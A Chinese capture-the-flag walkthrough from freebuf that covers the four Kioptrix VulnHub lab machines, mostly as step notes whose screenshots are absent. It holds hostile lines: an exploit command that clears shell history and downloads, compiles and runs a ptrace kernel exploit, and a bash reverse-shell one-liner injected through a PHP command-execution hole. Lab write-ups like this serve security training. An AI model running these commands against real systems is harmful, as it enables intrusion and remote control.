CTF靶场系列-Kioptrix全集 – 作者:陌度

下载地址

#Kioptrix: Level 1 (#1)

https://download.vulnhub.com/kioptrix/Kioptrix_Level_1.rar 

#Kioptrix: Level 1.1 (#2)

https://download.vulnhub.com/kioptrix/Kioptrix_Level_2-update.rar

#Kioptrix: Level 1.2 (#3)

https://download.vulnhub.com/kioptrix/KVM3.rar
#Kioptrix: Level 1.3 (#4)
https://download.vulnhub.com/kioptrix/Kioptrix4_vmware.rar

实战演练

Kioptrix_Level_1

查找该靶机的IP为192.168.199.230
image.png扫描端口
image.pngnikto扫到了不起的东西
image.pngimage.png试试这两个exp
image.png编译报错
image.png安装这个
image.png发现还是报错,查了一下
在764.c里面加入下面几句

#include <openssl/rc4.h>
#include <openssl/md5.h>

#define SSL2_MT_ERROR 0
#define SSL2_MT_CLIENT_FINISHED 3
#define SSL2_MT_SERVER_HELLO 4
#define SSL2_MT_SERVER_VERIFY 5
#define SSL2_MT_SERVER_FINISHED 6
#define SSL2_MAX_CONNECTION_ID_LENGTH 16

就可以编译成功

这个站好像死了,我们换另外一个网站的

image.png位置在这里624行,修改成下面

#define COMMAND2 “unset HISTFILE; cd /tmp; wget https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; \n”

image.pngOK,搞定了
image.png

Kioptrix_Level_1.1

扫描网段,找到IP为192.168.199.170

image.png80端口打开,看看有没有东西

image.png有登录框使用万能密码登录一下

image.png

sqlmap跑了一下,有注入,不过后面有命令执行,就忽略

image.png

看到这样的套路,就知道有命令执行漏洞

image.pngimage.png内核版本

image.png
使用nc监听1234端口,然后在PHP执行下面命令
;bash -i >& /dev/tcp/192.168.199.176/1234 0>&1
image.pngimage.png
提权
image.pngimage.png提权成功

Kioptrix_Level_1.2

找到靶机的IP是192.168.199.218
image.pngimage.pngimage.pngimage.pngweb系统要做host
image.pngimage.png在web扫了一波注入,找到了这个注入点
image.png数据库
image.pngimage.pngimage.png找到了一些信息

image.png
使用这两个账号能够登录进ssh

image.png按F3,进入到这个文件进行修改,然后按F2保存
image.png搞定
image.png

kioptrix_level 1.3

压缩包解压后,发现只有一个虚拟硬盘,需要打开一个虚拟机加入这块硬盘

image.png把原来的硬盘删掉,添加这块硬盘

image.png增加成功
image.png扫描到靶机的IP是192.168.199.100
image.pngimage.pngimage.png
找到了几个用户
image.png扫描web目录
image.png进入到web系统,发现有登录框,测试发现使用上面扫描到用户,可以爆出来用户密码
image.png

image.png使用ssh登录进去

image.pngimage.png使用mysql提权
image.png

来源:freebuf.com 2019-03-09 16:57:23 by: 陌度

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论